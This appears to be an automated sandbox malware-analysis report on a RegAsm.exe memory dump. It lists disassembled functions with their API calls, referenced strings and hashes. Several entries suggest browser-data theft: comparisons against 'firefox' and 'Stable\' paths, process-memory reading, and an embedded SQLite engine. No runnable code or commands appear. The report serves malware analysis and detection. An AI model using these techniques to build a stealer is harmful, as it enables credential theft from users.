                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 2005412495-0
                                                    • Opcode ID: 15a90aa08abd1b7f0407e5378db09f0277a502efb28e9984ecd923f6b9229d8c
                                                    • Instruction ID: 21bd01a89b860d135315606c98542cdd3223532f0af3f31ea5e13f43a36d2ffc
                                                    • Opcode Fuzzy Hash: 15a90aa08abd1b7f0407e5378db09f0277a502efb28e9984ecd923f6b9229d8c
                                                    • Instruction Fuzzy Hash: 49312B70A0022AEFDF10DFB5EA4529DBAF1BB19314F94502BE800A6250DBBD4891CF29
                                                    Function 004238A1 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __getptd.LIBCMT ref: 004238AD
                                                      • Part of subcall function 00422B51: __getptd_noexit.LIBCMT ref: 00422B54
                                                      • Part of subcall function 00422B51: __amsg_exit.LIBCMT ref: 00422B61
                                                    • __amsg_exit.LIBCMT ref: 004238CD
                                                    • __lock.LIBCMT ref: 004238DD
                                                    • InterlockedDecrement.KERNEL32(?), ref: 004238FA
                                                    • _free.LIBCMT ref: 0042390D
                                                    • InterlockedIncrement.KERNEL32(0042FF98), ref: 00423925
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                    • String ID:
                                                    • API String ID: 3470314060-0
                                                    • Opcode ID: 98aee3a4fd668f7eb30a9f5dc01cac07bd0b85ac9604045b71904aaf4fc5ac2d
                                                    • Instruction ID: 379d8b7d8491d82ad8bb22b4f2bebe489373273112c0eac8251e4c88c96dee02
                                                    • Opcode Fuzzy Hash: 98aee3a4fd668f7eb30a9f5dc01cac07bd0b85ac9604045b71904aaf4fc5ac2d
                                                    • Instruction Fuzzy Hash: F3017031B01A31ABCA21AF65B84575A77B0BF01715F95011BFC00A7290C77CAA528BDD
                                                    Function 0040FC25 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 166COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040FC57
                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040FCDD
                                                    • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040FDFD
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID: Stable\$firefox
                                                    • API String ID: 3722407311-3160656979
                                                    • Opcode ID: d8166f3787a0d41d1976c45dfa442f1c8a7be0b698ffb262b6a28a4aa4ece215
                                                    • Instruction ID: cbf8309fb132c234f00a8002d50fd01903081def217ec3781965348f70106fa4
                                                    • Opcode Fuzzy Hash: d8166f3787a0d41d1976c45dfa442f1c8a7be0b698ffb262b6a28a4aa4ece215
                                                    • Instruction Fuzzy Hash: 63513072A001099BCF24FB65DD86FED77B9BB54304F10402AE506FB1A1EE35DA48CB95
                                                    Function 1FB4BF00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 156COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NEAR$fts5 expression tree is too large (maximum depth %d)$fts5: %s queries are not supported (detail!=full)$phrase
                                                    • API String ID: 0-593389478
                                                    • Opcode ID: 44ddc1655922693bcc97fccba41c0656d16dcf0d2dec7783c8136f5dd37007b0
                                                    • Instruction ID: 799a5329e2dddb1e7bb1c4fcc6eae788fafdce760f92e30bff3d43d78a3ad086
                                                    • Opcode Fuzzy Hash: 44ddc1655922693bcc97fccba41c0656d16dcf0d2dec7783c8136f5dd37007b0
                                                    • Instruction Fuzzy Hash: 7E4103B1A007129FD714CE24EA80B5AF3E4EF84710F34856DE94B4B251E776F845EB91
                                                    Function 1FA6F490 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • unable to delete/modify collation sequence due to active statements, xrefs: 1FA6F533
                                                    • %s at line %d of [%.10s], xrefs: 1FA6F4BF
                                                    • misuse, xrefs: 1FA6F4BA
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FA6F4B0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify collation sequence due to active statements
                                                    • API String ID: 0-3348720253
                                                    • Opcode ID: 1419e8db2ce35aac359d12f13fcf7a2fdaa12c6f49a8486b1c2e64f577383571
                                                    • Instruction ID: e31ee437c2e45f79411ece9471b58f988dd0ed0344137b7f3eccb32c913b0b24
                                                    • Opcode Fuzzy Hash: 1419e8db2ce35aac359d12f13fcf7a2fdaa12c6f49a8486b1c2e64f577383571
                                                    • Instruction Fuzzy Hash: BF41F9726043415BD700CF28EC80BAAB7E8EF81325F54456EF5599B282F33EF5168B61
                                                    Function 00410F6B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • strlen.MSVCRT ref: 00410F80
                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00410FA5
                                                      • Part of subcall function 00410C9B: strlen.MSVCRT ref: 00410CA9
                                                      • Part of subcall function 00410C9B: strlen.MSVCRT ref: 00410CC2
                                                    • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,?,?,004111C0,00000000), ref: 00410FDE
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 004110EB
                                                      • Part of subcall function 00410E69: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00410E7D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: strlen$MemoryProcessQueryReadVirtual
                                                    • String ID: @
                                                    • API String ID: 2950663791-2766056989
                                                    • Opcode ID: c2cc1cfa85314c45910bc034ee98174cc7f0756178f724f4dc5a8228099645e7
                                                    • Instruction ID: 3b6d9c815a3ae0ce0ca4a092594ba94f9759023be61228e6920018aca85ab516
                                                    • Opcode Fuzzy Hash: c2cc1cfa85314c45910bc034ee98174cc7f0756178f724f4dc5a8228099645e7
                                                    • Instruction Fuzzy Hash: 9151F672D0014EEFDF04CF95D982AEEBBB1FF08304F10841AFA14A6260D779AA91DB55
                                                    Function 1FAD93A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: d36215663fb8b7fe1e89f3c7c5fcdde218b15a0ed14c529a25583408f63a1930
                                                    • Instruction ID: e7809d9687f51f614f3a01b5415153dd7ce26315d4a0e86c7e04f02c13b77906
                                                    • Opcode Fuzzy Hash: d36215663fb8b7fe1e89f3c7c5fcdde218b15a0ed14c529a25583408f63a1930
                                                    • Instruction Fuzzy Hash: 8A31267A650B904AC314DF28C890AF3BBF29F89711B54849CE9D74B746E72AE842D760
                                                    Function 004104D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004104F4
                                                      • Part of subcall function 004247E0: std::exception::exception.LIBCMT ref: 004247F5
                                                      • Part of subcall function 004247E0: __CxxThrowException@8.LIBCMT ref: 0042480A
                                                      • Part of subcall function 004247E0: std::exception::exception.LIBCMT ref: 0042481B
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0041052F
                                                    • memcpy.MSVCRT ref: 004105AD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                    • String ID: invalid string position$string too long
                                                    • API String ID: 214693668-4289949731
                                                    • Opcode ID: e5b232cd123efaeaa95fb36e2afcc041d99b40ae121c1f4424e2e942fef76a13
                                                    • Instruction ID: e16fd1244e6cb9c7732594b1692051b148c348e24bcd1216b80b99f717e1379c
                                                    • Opcode Fuzzy Hash: e5b232cd123efaeaa95fb36e2afcc041d99b40ae121c1f4424e2e942fef76a13
                                                    • Instruction Fuzzy Hash: 7F418F74E0024AEFDB04CF98D5819AEBBB1FF09340F504496E915AB351D774EA90DFA8
                                                    Function 1FA64F40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: 41fd5820155ea8e07efa5aa53526e88de1a4cfede4e237385c6c7eb1f6f5adbc
                                                    • Instruction ID: fd54f250e4b0da3ef98a36eb4747c8e06c1e264dc4a14aafc0cc05ea73ef576a
                                                    • Opcode Fuzzy Hash: 41fd5820155ea8e07efa5aa53526e88de1a4cfede4e237385c6c7eb1f6f5adbc
                                                    • Instruction Fuzzy Hash: 2B31F5762146416BC3019B29DD80BE5BBE0FF55321F084266F858CBA82E32DE960E7B0
                                                    Function 1FA31C60 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FA31D4B
                                                    • misuse, xrefs: 1FA31D46
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FA31D3C
                                                    • unknown database: %s, xrefs: 1FA31CBD
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unknown database: %s
                                                    • API String ID: 0-142545749
                                                    • Opcode ID: cfa23fe99fabaf2b7bddc8b45284ec7beb996cbed2e592f3697ae5041651af50
                                                    • Instruction ID: 7eef05912cf4f3351103a890cf00c729ffadc74adc45f4a4217977bc9d3253a9
                                                    • Opcode Fuzzy Hash: cfa23fe99fabaf2b7bddc8b45284ec7beb996cbed2e592f3697ae5041651af50
                                                    • Instruction Fuzzy Hash: CC2121B5E007416BD7209B29AC40FDB7AB99FC276AF20092CF85856281E73DB515C772
                                                    Function 1FA63FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: 3cd358e1ca42ba51d25a54138da37758c9e1198481ad8a6ab28b2e7f0f41f66c
                                                    • Instruction ID: 3f096c9d817bd2d985e17258236629ee4143896972d9d553bd53733d01df6fef
                                                    • Opcode Fuzzy Hash: 3cd358e1ca42ba51d25a54138da37758c9e1198481ad8a6ab28b2e7f0f41f66c
                                                    • Instruction Fuzzy Hash: 6D21C1B7A503216BC700DE18DC41AEB7BE0EB94661F524426FD4897201E22DE65997E2
                                                    Function 1FAD9290 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
